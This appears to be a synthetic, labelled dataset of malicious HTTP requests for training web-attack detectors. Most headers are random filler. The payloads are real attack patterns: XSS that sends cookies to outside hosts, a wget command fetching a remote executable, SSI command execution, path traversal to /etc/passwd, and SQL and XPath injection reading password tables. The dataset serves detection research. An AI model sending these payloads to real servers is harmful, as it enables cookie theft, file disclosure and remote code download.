If-None-Match: "S7aGc5OXUPvl1LMd"
If-Range: *
Max-Forwards: 14
MIME-Version: 9.9
Pragma: remcbotW='r'
Proxy-Authorization: Qyeeu qzNllaee=zsachi
Authorization: NTLM YWlyY280MXRqaGd0dGVlc21pZnQ0bEFrb29mZVJnZFM2
Range: -2,795-,-91
Referer: http://rrsrert.cz/hgWg/ri1najm/oBEHsrn/eedoet/wntnsm.msf
TE: trailers
Trailer: Referer
User-Agent: 7Iseajdeesnlo
UA-CPU: x86
UA-Disp: 402,257,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 5667x180
Via: 5.1 www.trohA2sS.gif, ehd/3.6 250.138.35.59:99, ono4wp/7.1 www.edd8oooe.shtml
Transfer-Encoding: ikai; mnotso=9pei
Upgrade: uOlpzt/0.0, odsnal/9.4
Warning: 170 126.27.186.211 "do3kdsikezlS" "Fri, 29 May 09 15:50:00 UTC"
X-Forwarded-For: 67.28.144.149
X-Serial-Number: 1714241
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43990
Start - Id: 36258
class: PathTransversal
PUT /C3zn/iritrum4i64.exe? HTTP/1.1
Content-Length: 58
Content-Language: btbsh,t,itsaeio
Content-Encoding: compress
Content-Location: /qopouDrd/uccjictu/sxmh/i7itoRqs.conf
Content-MD5: c2hyaFltcmVlVG9qNXRVZA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 09 Mar 04 06:59:31 CET
Last-Modified: Sun, 01 Feb 09 12:08:25 UTC
Host: www.ecnwGlio.gov
Connection: scstpQ
Accept: */*
Accept-Charset: iso-8859-2;q=0.0, iso-10646-ucs-2
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 112.174.108.236
Cookie: rNopadbwagmeo2t=eIlM;9tginmnP=qK11jFCRb;1irss0ovoik=oeweeunthunOs;KtNQwEJOMRB=6
Cookie2: $Version="1"
Date: Sat, 21 Jul 07 17:33:15 UTC
ETag: W/"jRY8PxZkXX-fCGouhR8"
Expect: eigacm=eafotax;3ngniEI=1owL6ot
From: tarcw@rtJihd7rad.st
If-Modified-Since: Thu, 06 Dec 07 08:27:36 UTC
If-Unmodified-Since: Tue, 21 Mar 06 13:19:29 CET
If-Match: "kRIZOq9LqOFAQ_5YHF_"
If-None-Match: "FNgOUp_BeNPShhitxQ"
If-Range: Thu, 08 May 08 19:56:09 UTC
Max-Forwards: 3
MIME-Version: 4.1
Pragma: no-cache
Authorization: NTLM ZU1ta28zbnVhaWVidXRzZWVNbmNubjVTZXhzYW9oaWFleGVuYU1vdEE=
Range: 52-067988,48957-
Referer: http://r4slnc.com/e7AfetcE/keftOea.mpeg
TE: gzip;q=0.6,trailers,deflate
Trailer: Via
User-Agent: arMCfG0sZ http://www.miteaia.fr
UA-OS: Mac OS X
UA-Pixels: 274x803
Transfer-Encoding: deflate
Upgrade: ensibi/4.7, tetheo/8.4, iarhfi/9.3, lh4tm/2.6
Warning: 120 183.198.212.10 "5hoema" "Mon, 27 Nov 06 04:28:46 GMT"
X-Serial-Number: 373561345188
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

UPvSG=/etc/passwd&hdCvEtt5E5o=(stof&htettsh2T=enfluq

End - Id: 36258
Start - Id: 47254
class: XSS
GET /eseeeebLpnseeieic/kNuynzy./vX3P.Y-IAyzdEko/iosrInvOpwNt9lDgner/nX9sf/-9m03x/a7eo1nss2ye/to4vdiaes/_SZelX/mFhN/fzaDRfEM/tqsushior.php3?ramasaEmeneooo=9&hsatfsg=nGwrhrr6s&denmni=lqAoN1ZkAHJ&asepem=usEnpdexeceg&0dHh6t8s0tlr=n%2Fhomeo&nnuuberstyw=toinput&mnmtSvtlasoedn=nph-le&ndoeeGsy=12889842&lsg=%3Cimg+src++++%3D%22++nsneil+++%3E+++%22+++onmouseover++++%3D%22++++%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.il.com%2Fcgi-bin%2Fliorro.cgi%27%2Bdocument.cookie%29%3B%5D++++%22+++%3E&passwdbHZc33=60039425&sjcr=saEa2nMd+ssdd HTTP/1.0
Host: 87.135.174.74:80
Connection: close
Accept: */*;q=0.4
Accept-Charset: windows-874;q=0.2, euc-cn;q=0.5, x-mac-turkish, euc-kr, iso-8859-2
Accept-Encoding: compress, compress;q=0.8, deflate, deflate
Accept-Language: jOsacete-o;q=0.2
Cache-Control: min-fresh=77465
Client-ip: 41.54.252.143
Cookie: e18gatNi6egnat=feaa7eseei;htNoOne=;xssou%deacande=He7;ieaHoehi8j6o=Tflikex&lDD$'wnyr
Cookie2: $Version="62"
Date: Thu, 08 Mar 07 20:36:01 CET
ETag: W/"q0-hAtnazO7nbLaKys"
Expect: 100-continue
From: mP8eatM@krgt.fr
If-Modified-Since: Tue, 11 Sep 07 15:28:44 GMT
If-Unmodified-Since: Tue, 26 Jan 10 12:40:54 CET
If-Match: "KC6CdXakHl7FHJRg0_D"
If-None-Match: "XsKE8PY06ZRrViyHjqJy"
If-Range: "p3.BQaZCl7N6PhYI"
Max-Forwards: 1
MIME-Version: 3.6
Pragma: aoTec='ois'
Proxy-Authorization: 6ndit medexEq=belmLsj
Authorization: NTLM YWRibm9hY2VteWVueWVpaXRzbzZyZTV0b2Jwenl0VzVjeWxpaWVsc2E=
Range: 33-500,52893-,358-
Referer: /Ivpwjn/aNAEqs.wav
TE: gzip;q=0.5,deflate,deflate
Trailer: Proxy-Authorization
User-Agent: Mozilla/1.9 (Machintosh; U; PPC Mac OS X 2.6; ee-ru; rv:3.0.9) Gecko/98266795
UA-CPU: StrongARM
UA-Disp: 390,072,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 077x3740
Via: aHcv/6.6 49.181.57.164, Pmhll/3.2 112.15.42.138
Transfer-Encoding: deflate
Upgrade: ebpgud/5.5, uo6ys/3.0, eeei/3.0, wOU/7.9
Warning: 231 178.152.9.49 "iem9a" "Sat, 05 Jul 08 14:59:50 GMT"
X-Forwarded-For: 29.33.63.135
X-Serial-Number: 15152704800
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47254
Start - Id: 36338
class: PathTransversal
GET /scoedgU5re/ncC0etl./oSire8LcruhainloEtnp/eaLYG-LtUxtermlv/Jn_DCEGjjQ1@kg/s4qqmo/oincludelstyleIAqa6y-l3GA/ohinoveiEynt3iieevi.jpg?tdnoim1nR=xyidothorekpsjwr&1XcWaq=t7oAXJo&4jZft=yi&0yxsock_stream3S4f=I%29idk1+t&eeuoou=3x&3srra=521&gf3faewSofp6=tMJhjDZf&yoemwnrd=7536&iaebaeiCghof=..%2F..%2F..%2F..%2Fvar%2Flog%2Faccess_log%2500.html&replaceh.VincludegjVZUi=nq+T&zpEwrse0=nh5jtflpn&mih8nea=tK%3CxtermRtiit0woz HTTP/1.0
Host: www.adttOee.com
Connection: nngssteh
Accept: */*
Accept-Charset: hz-gb-2312;q=0.4, iso-8859-15;q=0.5, x-mac-cyrillic;q=0.6, x-mac-korean;q=0.3, windows-1255
Accept-Encoding: identity, gzip, identity, compress, gzip;q=0.9
Accept-Language: GAh62rrn-rocz6yh;q=0.7, 4teb-e;q=0.0
Cache-Control: no-store
Client-ip: 179.242.140.245
Cookie: uhtzeroi=2845;gsp2isruApo0OpL=361209;oftltijegosecM=9530;qdoi=8;8xftXwinntDk=dh>r\
Cookie2: $Version="046"
Date: Fri, 19 Dec 08 21:04:29 CET
ETag: W/"tsYw13ebqOwIYmPl_3q"
Expect: 100-continue
From: ee11@seia.cz
If-Modified-Since: Sat, 21 Feb 04 10:25:51 UTC
If-Unmodified-Since: Sat, 19 Aug 06 22:42:12 CET
If-Match: *
If-None-Match: "othgk8Zr41xdFW1cnjFU"
If-Range: ".EK8LPwHe3nrwYsMSq"
Max-Forwards: 86
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: Digest response="Fa230DfDdCBDc8d6dFdD9e980dE5c6ab"
Authorization: Basic dGVpZjpyb2V5
Range: 94941-674,-88804,1546-98301
Referer: http://lEaen.be/eeqos/soaa/iedeh6g/yb74tqg9/eeeeuB.cgi
TE: trailers
Trailer: User-Agent
User-Agent: oepeAIkH88eenhaeon
UA-CPU: StrongARM
UA-Disp: 617,065,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 002x9850
Via: 8.3 www.5oajy.tiff:5
Transfer-Encoding: identity
Upgrade: eu5/4.0, mt8ten/8.9, s8ho/9.0, nroaa/5.2, 0uhn4/9.3
Warning: 187 www.erlho.html "TnrEu" "Thu, 07 Sep 06 16:36:18 GMT"
X-Forwarded-For: 112.141.222.2
X-Serial-Number: 9001886715622
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36338
Start - Id: 45610
class: PathTransversal
GET /SbwbZOunionUtC/tzLmJfM/eZUktbADKGY.-Zs0IB/i3/aYgN/oeDOekoourmws/dV7m.RPLtR/fNtmbtniAlcsTr/zar35.asmx?hpvIoolckyrtm=8870545&tnrwhqteoiiSfi=..%2F..%2F..%2F..%2F..%2F..%2FWINNT%2Fautoexec.bat HTTP/1.0
Host: www.nho0E.org
Connection: nlQrhTb
Accept: */*
Accept-Charset: iso-8859-9;q=0.6, x-mac-cyrillic;q=0.5, x-mac-ce
Accept-Encoding: *;q=0.0
Accept-Language: Ssomao-rz;q=0.8, e9o-s, ohid-yeaiuni, iiikh-s;q=0.1
Cache-Control: no-transform
Client-ip: 192.56.249.182
Cookie: Hnteosrr15tit=eUeGe-;E4JM3ZchildXOX=Brz1ei47m7;1DhPm9c.fl=oMW;en1=aornda0sni;eshtTv=lh1
Cookie2: $Version="71"
Date: Fri, 10 Apr 09 07:16:27 GMT
ETag: W/"hYq.Qe6vS5JVPkNg"
Expect: 100-continue
From: f4re3ea2@HiNl.uk
If-Modified-Since: Tue, 03 Jun 08 14:31:31 GMT
If-Unmodified-Since: Sat, 06 Nov 04 20:35:54 CET
If-Match: *
If-None-Match: "2mV2QwsXwi2Wo9KAEEK"
If-Range: *
Max-Forwards: 07
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: ench vu6n=5eeTe
Authorization: NTLM ZG5mQmVwaGFqdHN3M2g3d1JwdGQzMGkzaG1FSWNubU5vdWlzZXRpY2VhdHVz
Range: 942-,71595-5
Referer: http://mcfdrr.st/eknoa1Fr.pl
TE: deflate;q=0.5,trailers,chunked
Trailer: Via
User-Agent: skltAxGq http://www.tnw8aS.it
UA-CPU: x86
UA-Disp: 6050,986,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0039x975
Via: 9.5 214.159.68.124, 0wuae/8.9 www.feldc.js
Transfer-Encoding: uRazet; srieue=hqohnosi
Upgrade: wdths/1.4, ocajr/8.7, hnt/8.6
Warning: 979 249.143.44.161 "mpeqyef6" 
X-Forwarded-For: 48.145.225.109
X-Serial-Number: 749320741
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45610
Start - Id: 39894
class: SSI
GET /jga8rA4z5sfL/umZnMV8l08/nset5dUff5Pe6Dt/3aNIhYQmQkAKBYr9kd8.tiff? HTTP/1.0
Host: 151.143.79.215:1206
Connection: close
Accept: image/*
Accept-Charset: macintosh;q=0.3, iso-8859-9;q=0.9, cp-950;q=0.1, iso-8859-5, windows-874
Accept-Encoding: 
Accept-Language: cjdro4-eun;q=0.5, atasimb-ai, 7-hpipi
Cache-Control: min-fresh=3761
Client-ip: 32.78.180.99
Cookie: L0Zzpx1tTa0H=Nls1;CpsYNCThtaccesRKOSg=iKl;ylgB=e;etkrwe=<!--  #exec  cmd="/bin/ls   -l   /home/lbhote/bscg5tnzne" -->;geyei7nolh8=eYEx-DeUW6f8
Date: Thu, 17 Aug 06 15:49:10 CET
ETag: W/"m@A3-3qg3R@Ze.P8Fny"
Expect: 7moit=ojcheee;o2xmttj=oHmitae
From: nqgz@roap.de
If-Modified-Since: Wed, 14 Jun 06 04:55:08 GMT
If-Unmodified-Since: Wed, 22 Jun 05 16:00:54 UTC
If-None-Match: "3L8PHQcHhFpdjZQ"
If-Range: "3Eeet4grNY8uzYWF"
Max-Forwards: 0
Pragma: rc='eop'
Authorization: NTLM c3JuYWRvb3Z5dGFzZW5kdG93aXRlcmVlZWlldHNlc3FvcmFhaXF0NWxs
Referer: http://www.ie7oc.ch/Rzxilr/u4U7a/oohii/co0es/en8i91t.jsp
Trailer: If-Modified-Since
User-Agent: Mozilla/8.1 (Windows; U; Windows NT 7.1; vx-Ae; rv:2.9.7) Gecko/26842561
UA-Pixels: 289x1105
Via: HTTP/1.9 www.new7sg9e.gif, FTP/1.5 www.bsmfrrd.html
Transfer-Encoding: compress
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39894
Start - Id: 49918
class: XPathInjection
GET /qh/e-_/noellrd22snc/sidnien5aesfLf/itiaetgtjowhe/ps-/pnMJ@yPhQuh6Nc.htm?tc=o%7Eo&YiltDv7h=c4hr5t6+v&swgf=i%40VICmO_0UA&tefnttmhDA=7&tNwid6le1yryt4s=g0RR%40a&futxtTitbaii=71710&ba=66057&Stueoi2C=ireplaceetcc%3BliaznaermY5&sdeetidnges=ofema2y%27++or++++6e%2FOis%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D3%5D+++or++++%27qEq87a%27++++%3D+++%27 HTTP/1.1
Host: 225.155.67.195
Connection: keep-alive
Accept: */*
Accept-Charset: us-ascii;q=0.7, cp-932
Accept-Encoding: deflate, compress;q=0.1, deflate;q=0.2, deflate;q=0.7
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 71.34.148.218
Cookie: seoeanHquean=18714
Cookie2: $Version="34"
Date: Wed, 01 Jul 09 19:56:18 GMT
ETag: "-PkzT_C75R64usx5m"
Expect: 100-continue
From: rmxetsnS@eaotitdn.com
If-Modified-Since: Sun, 31 Oct 04 22:31:48 UTC
If-Unmodified-Since: Sun, 26 Jul 09 14:35:29 UTC
If-Match: *
If-None-Match: "dM_3.aCDTIOrTRRFHb.v"
If-Range: Fri, 02 Jun 06 22:25:22 GMT
Max-Forwards: 72
MIME-Version: 8.6
Pragma: eg='o3uEee'
Proxy-Authorization: NTLM d2Rha2V0dHZsd3NyZmVzc25Ub25jaW5lZGVrc3RvZWttckpFbmN1c2w=
Authorization: 2ahlAk eisydtns=lNj3t
Range: -983
Referer: /untf5h.cgi
TE: trailers,deflate,trailers
Trailer: Host
User-Agent: Mozilla/4.4 (compatible; MSIE 5.0; Win98; eoibaah9; aezm)
UA-CPU: MIPS
UA-Disp: 3308,0110,8
Via: 2.8 www.nsacE.png, 6.8 217.222.110.85
Transfer-Encoding: compress
Upgrade: qfe/8.0
Warning: 682 www.f0shh3eu.jpeg "tocdihgtUi" "Fri, 20 Feb 04 11:54:19 CET"
X-Forwarded-For: 140.231.93.34
X-Serial-Number: 2013029504
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49918
Start - Id: 39691
class: SSI
GET /nicoti8nqh3sxi/Dy/s8U6na5/dstdptaslesx4uneUdvs/ithli/t-ficzL64hS/aTfNessoshalhl/1B3g0F7rStmpCZd4.php3?j@FnetcatOr.4kCWN=i5l&bae=eeLi1mes&irl4cast=63630935&au=04889914&eincGZB1HuG=2&e5aw=11&drI9dn=ba+nexCc&eSrsr7s1rtrtNtn=656&lvryi3msh1Esso=h%40.3kBC%40&azrQt6aehfcbe=29428401&RXR@=%3C%21--+%23include+virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22+++--%3E&otctrd=Cea HTTP/1.0
Host: 116.91.7.117
Connection: keep-alive
Accept: */*
Accept-Charset: iso-2022-jp
Accept-Encoding: deflate, compress;q=0.8, identity
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 170.88.156.59
Cookie: acs=EfdT;fReO=mbgsoundsinputi;tpmkPifOs8nire=44;lPih8deftrnoeo=5104153
Cookie2: $Version="38"
Date: Sat, 17 Sep 05 17:01:22 UTC
ETag: W/"xkPYfz.4VPY.xSX"
Expect: 100-continue
From: ekb7rls@onnByehnb.gov
If-Modified-Since: Thu, 05 Mar 09 18:55:28 CET
If-Unmodified-Since: Wed, 14 Jul 04 02:34:49 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Digest nc=ddEF82d6
Authorization: Digest algorithm=MD5
Range: 11490-87515,-392,063833-721563
Referer: http://rorT.cz/rtienn/dr0up.exe
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/6.0 (Machintosh; U; Mac OS X 1.8; ai-4e; rv:3.8.0) Gecko/53281060
UA-CPU: Sparc
UA-Disp: 0266,938,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 726x074
Via: FTP/0.3 www.yrla.htm
Transfer-Encoding: compress
Upgrade: im0/0.0, gln/3.7
Warning: 245 www.etcYe.gif "ra5teOtlcka8shsedl7" 
X-Forwarded-For: 166.133.168.205
X-Serial-Number: 9911764547155
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39691
Start - Id: 47516
class: XSS
GET /hqsW9Aiy@z0F/eObhtW9mvlKUC8950/4b8@rSt06M/eKg.V-hEFzmik/mdIWA1ZOb1h-F/lke1Gk4jIc@17k-Fr.mspx?a5s9xfr=9377&7oe=+yenauatpt9ei&RB.w=fteCgs&hn9ede3=tsnt&EUetxle46smo=402276&ssrtiaSempa7sd=ntpe&aniusio0lshtai=s+Ll&tjttONywteny=rras1lq87%40ji&nof=6382698&mt2d=75&rxrse=ntpyusrn&emdRwtw=mlo&slswihhor=otltwindow.openrdivYT2ns&NilfMMKxGM=%5B%5CxC0%5D%5B%5CxBC%5Dscript++%3E%5Bwindow.open%28%27http%3A%2F%2F214.239.146.216%2Fngit.cfm%27%2Bdocument.cookie%29%3B%5D%5B%5CxC0%5D%5B%5CxBC%5D%2Fscript++++%3E HTTP/1.0
Host: www.0lem8Heebz.it:80
Connection: close
Accept: image/*, video/*, text/*
Accept-Charset: x-mac-japanese;q=0.1
Accept-Encoding: 
Accept-Language: aE-r5;q=0.8, 0ndta-vAtteso, sia-c9ym, 9n-oLe3
Cache-Control: no-store
Client-ip: 239.176.170.100
Cookie: eikze=55983792;ho=ecEeuD
Cookie2: $Version="7"
Date: Wed, 04 Aug 04 20:31:03 GMT
ETag: "zubBZp.p71Br16Td"
Expect: 100-continue
From: eudn2a@se5tse.com
If-Modified-Since: Fri, 02 Jun 06 23:46:46 CET
If-Unmodified-Since: Tue, 16 Oct 07 02:44:56 CET
If-Match: "GtXlpG9O2ov-7RCxd"
If-None-Match: *
If-Range: *
Max-Forwards: 6271
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: solli r3h4i=aotni1
Authorization: NTLM M0xpZWUxb0JjeGhmbG96NHBoaWN0d295QW0xcGFuc3I=
Range: -53,788-6
Referer: http://www.n2o4O.biz/p3snjehE/ren0.mdb
TE: chunked,trailers,gzip;q=0.1
Trailer: Range
User-Agent: labreeldtye
UA-CPU: PowerPC
UA-Disp: 076,499,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 7841x155
Via: 7.7 114.224.208.33
Transfer-Encoding: identity
Upgrade: atsa/8.3
Warning: 065 134.123.203.94 "ntssttrkginowelli" 
X-Forwarded-For: 178.21.22.223
X-Serial-Number: 870651819
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47516
Start - Id: 42970
class: OsCommanding
GET /aqrlZf1PH8-WZLTonwb/oimdtstdnem7nboue/2wfh/o-62xnWvUQ_nEzSz/3oCXV8IZ1fbBiF/eS@eSZlTJ@xflWfb95AB/oerh/JfmsrCor7s3h1fhO/iFVox9piduIlY/e_rdb4e3iZ.bin? HTTP/1.0
Host: www.e1pephe.net
Connection: keep-alive
Accept: video/*, image/gif;q=0.1
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=271
Client-ip: 77.247.172.242
Cookie: 0iiyrs=i45;Dtca=781;aniolf=\nwget http://176.5.145.121:63/nftp.exe
Cookie2: $Version="72"
Date: Sun, 06 Nov 05 08:57:21 GMT
ETag: "r7Hapr3GiPAntNlzNv"
Expect: 100-continue
From: ajo2eno@Il3E87.biz
If-Modified-Since: Sat, 17 Jan 09 08:04:10 CET
If-Unmodified-Since: Sun, 10 Dec 06 20:02:26 UTC
If-Match: "1IHT1N9bRUeKEUH-_"
If-None-Match: "BPSC.0qPUAmty7Tpr"
If-Range: Wed, 11 Apr 07 17:29:41 CET
Max-Forwards: 9
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Basic aWl3dDp5aWNidHQ=
Authorization: 3uhnad rahrne=3torltij
Range: 015-2505
Referer: /zrcAni/nu7bdY/EldEs7e6/alan.pl
TE: trailers
Trailer: Upgrade
User-Agent: oOotohbec (sYzShO)
UA-CPU: StrongARM
UA-Disp: 9659,2069,32
UA-OS: Windows 98
UA-Color: color16
Via: HTTP/4.5 www.ssmE.png:2054
Transfer-Encoding: identity
Upgrade: 6tes/6.0, eset/0.0
Warning: 430 www.ooy4teh.gif "nn6ltSh" "Wed, 15 Nov 06 17:03:14 GMT"
X-Forwarded-For: 5.63.56.150
X-Serial-Number: 481448
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42970
Start - Id: 41474
class: SqlInjection
POST /trst9eeZnea4cyos/aKFF4S/aObsN/ishesopiot9xepet2id/D_RintOo/ekETWDkT/nGpEppKfdlvBa6JLbC@/ehN1hsZc/anaoes/ewat1ra/ubXupPfMatZl1/oZAtbf@.jh.jpg? HTTP/1.0
Content-Length: 151
Content-Language: engcsmp,Geq3ka
Content-Encoding: identity
Content-Location: http://athi.cz/rnpdsbg/oyu4/ogrr.mspx
Content-MD5: Y3cyZXFkckk4bHRzaWhubw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 10 Jan 10 11:19:35 UTC
Last-Modified: Sun, 06 Apr 08 16:19:11 GMT
Host: www.ntg1.fr:80
Connection: close
Accept: image/*, audio/*;q=0.1
Accept-Charset: iso-2022-kr, x-mac-icelandic, hz-gb-2312
Accept-Encoding: 
Accept-Language: iz-6hj3ytEh, sthe-b5ijbo;q=0.5
Cache-Control: no-store
Client-ip: 33.190.206.236
Cookie: layj=0661907274;ooxthe=1803576;tai=Hdariy6;euee=85218566
Cookie2: $Version="4"
Date: Sat, 30 Aug 08 23:16:31 GMT
ETag: W/"fXwEEo9cRQPW3zV"
Expect: nvcrmt2
From: t0cih@nlhtfemb7.st
If-Modified-Since: Sun, 04 Apr 10 07:29:26 GMT
If-Unmodified-Since: Sun, 13 Jul 08 17:43:47 UTC
If-Match: "reHY6kSAzc25vULIjl77"
If-None-Match: "W4g5huuYPxSucrdBruY"
If-Range: Sun, 31 Jul 05 18:27:55 UTC
Max-Forwards: 7
MIME-Version: 4.5
Pragma: ne=taavEa
Proxy-Authorization: Basic NkJjbTphZ3JsMmp3ZQ==
Authorization: Digest uri=/itEeiytn/o9eohet/gmrs/sfod/42T2.mpg
Range: 78-403185
Referer: /Rhuiunh/eiicr/zrunptlt/cmbgtihe/no5opeaJ.exe
TE: gzip,deflate
Trailer: Accept-Encoding
User-Agent: Mozilla/7.6 (compatible; MSIE 2.1; Open BSD i386; 8fEob; lAduoi; ftdq)
UA-CPU: MIPS
UA-Disp: 338,3350,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 054x8213
Via: 0.2 160.142.194.217
Transfer-Encoding: identity
Upgrade: duea/0.0
Warning: 013 130.95.230.195 "uusnotnttoteatpfbu1" "Tue, 08 Nov 05 20:23:16 GMT"
X-Forwarded-For: 37.28.59.187
X-Serial-Number: 40748942
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~

gteEha=crh3scmJT21ti0eese&fTnuiensag='union select  PASSWORD    from    DBA_PASSWORD;--&eyb45iiClE=8137197&fantyarseeqi9z=mwSU_ty3&pf.W0p2mf=;oiz

End - Id: 41474
Start - Id: 48483
class: XPathInjection
GET /et86Ldhfuys2WWL_t/vDMdnmArlinkscriptACsSd/na.js?1tetdtgnueAgtd=gpP&ohxiIker=ed5+4ftm HTTP/1.0
Host: 68.57.139.75:80
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: sn87oea-t;q=0.6
Cache-Control: max-stale
Client-ip: 218.16.60.205
Cookie: wexe6pberhran=772742;aasepe=aLsah;itmedteotne=33;nBpfWNf=L0bdiaextcfpeH;oEthU7=p0' or     count( path/child::node()[position( )=((    i  +  j   +  k   +    l+ 1)]  | path/child::*()[position()=(k+1)])=1    or 'fDeosuea'  = '    le'  or;o9tb1oaztlorne=5188699
Cookie2: $Version="1"
Date: Wed, 17 Feb 10 11:01:10 UTC
ETag: "9VDzGcaL6q_T7I8lGDUV"
Expect: 100-continue
From: mrnyCs@eeshcWcr.st
If-Modified-Since: Mon, 06 Sep 04 05:56:51 CET
If-Unmodified-Since: Sun, 08 Nov 09 22:25:32 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 1.8
Pragma: cse=ett3y
Proxy-Authorization: Basic ZTBoQ3Y6bG50dA==
Authorization: Basic eWV0ZW5zOmVkYU8=
Range: 661652-,3525-0062,58-
Referer: http://www.nenaEt8.de/andaeohU/ziat3oen.tar
TE: gzip
Trailer: If-Unmodified-Since
User-Agent: Mozilla/4.4 (compatible; MSIE 7.2; Mac OS X; tc2fsrmoom; r2ia)
UA-CPU: MIPS
UA-Disp: 649,617,16
Via: FTP/9.2 22.163.212.95, biE/8.5 96.158.37.42
Transfer-Encoding: gzip
Upgrade: Hefn/9.6, tsdyh/5.9
Warning: 680 250.180.120.85:81641 "aeotpteiihtinNeoa0" "Sun, 18 Feb 07 20:05:49 UTC"
X-Forwarded-For: 251.205.102.149
X-Serial-Number: 4528760269651048946
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48483
Start - Id: 45281
class: PathTransversal
GET /rdasdteTiei3m6/5edhi7nuhecqaee/elZqY@i0n/O7jtuE/.connectqbh/5Xj5b/e5j/i_n3i4m4tZCp46-q/th6jhene/seusEeine9Vhro.bin?mUJRgPWdCv=p_iJ&xe3eoy5re=6632152&lme=%26x6e&ucttr9jTqqs=48257&lroon=hsbnume2pasbsy&firg=404786&eaog0tfa2esgm=884314359&t8Xe=dfyCh&As=003&3aaaR0dN0eAab=hL_5rin&mnff=%7E2Ads&Ssio1tt=ipea%24TehorTy HTTP/1.1
Host: 161.160.157.11
Connection: oeude
Accept: application/rtf, video/*
Accept-Charset: x-mac-roman;q=0.4
Accept-Encoding: ..\..\..\..\..\..\..\..\..\WINNT\system.ini
Accept-Language: stda4b-ruh0l;q=0.7, g6-n2eL, lohHrf1r-tmhhai, therrtt-RmworL;q=0.4, n-h2amgwas
Cache-Control: only-if-cached
Client-ip: 226.116.80.221
Cookie: kcts=ewsff=lttmpmp&y;rdDsn=46;onprdelklo=jservicesor;citn9moP=6151319560
Cookie2: $Version="13"
Date: Mon, 03 Jan 05 20:52:46 CET
ETag: W/"5sS.bHdpvUqWsjVo-1h"
Expect: aeTlp=dno8;rrrr=pi9LpXz
From: rbsUWnn@YmenqRDyh.st
If-Modified-Since: Wed, 23 Sep 09 04:05:46 UTC
If-Unmodified-Since: Wed, 20 May 09 18:13:52 GMT
If-Match: "GqAiMuTsuNH3olHgo"
If-None-Match: "VMEW5.0n-uNujY8TP8"
If-Range: *
Max-Forwards: 9517
Pragma: no-cache
Proxy-Authorization: NTLM dGFtbmFwdHZkcnNlMDJpUmtyZHRpRW9lb2VBN2lyemFnZW1oZQ==
Authorization: NTLM RTFOdFNuaDJFb2FjMm55bmNmOE9uaWVhbG9hYXNlaWF3ZQ==
Range: -3,07-8,-6
Referer: http://witrNc.org/ioor.cfm
TE: trailers,trailers,gzip;q=0.0
Trailer: Expect
User-Agent: orxPHL6ePu http://www.mfyTgun.gov
UA-OS: Win9x
Via: 9.2 www.84mis.html, 0.4 138.197.181.109
Transfer-Encoding: identity
Warning: 249 www.tahor3d.jpeg "da7hcghtEielneFaue" "Mon, 11 Dec 06 16:37:58 GMT"
X-Forwarded-For: 238.149.119.17
X-Serial-Number: 9794861505024683521
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45281
Start - Id: 35064
class: SqlInjection
GET /02OhT5sN/htadwe/eXMHmKCG4OmOK2CP/lastM.swf?Bjctmp=wonEoooieCi&StibnqrhmAoasO7=%29&nyotpWktan=eFBSH4t%7EI%26ao&en60en4ig=26010165&ihxE8Rmeuited=ausr+etis-coia&s2tfm3MefO=2021&atanyopMIonlxE3=w2OO1&Atetii=352826&Re=%27%3B+EXEC+++master..sp_makewebtask+++%22%5C%5C23.36.122.24%5Ct8pitoLe%5Crriinhs2.tiff%22%2C+++++%22SELECT+++*+++FROM+INFORMATION_SCHEMA.TABLES%22&pnV4qeos8tm=1045&dt=insert4+e&2esaqo9w86w=%27mPq&HeQ.style9FN.acceptY1=2ethomeBoqye HTTP/1.1
Host: 145.195.158.74
Connection: ab9wecj
Accept: application/rtf;q=0.9, video/quicktime;q=0.3, audio/x-wav
Accept-Charset: *
Accept-Encoding: *;q=0.0
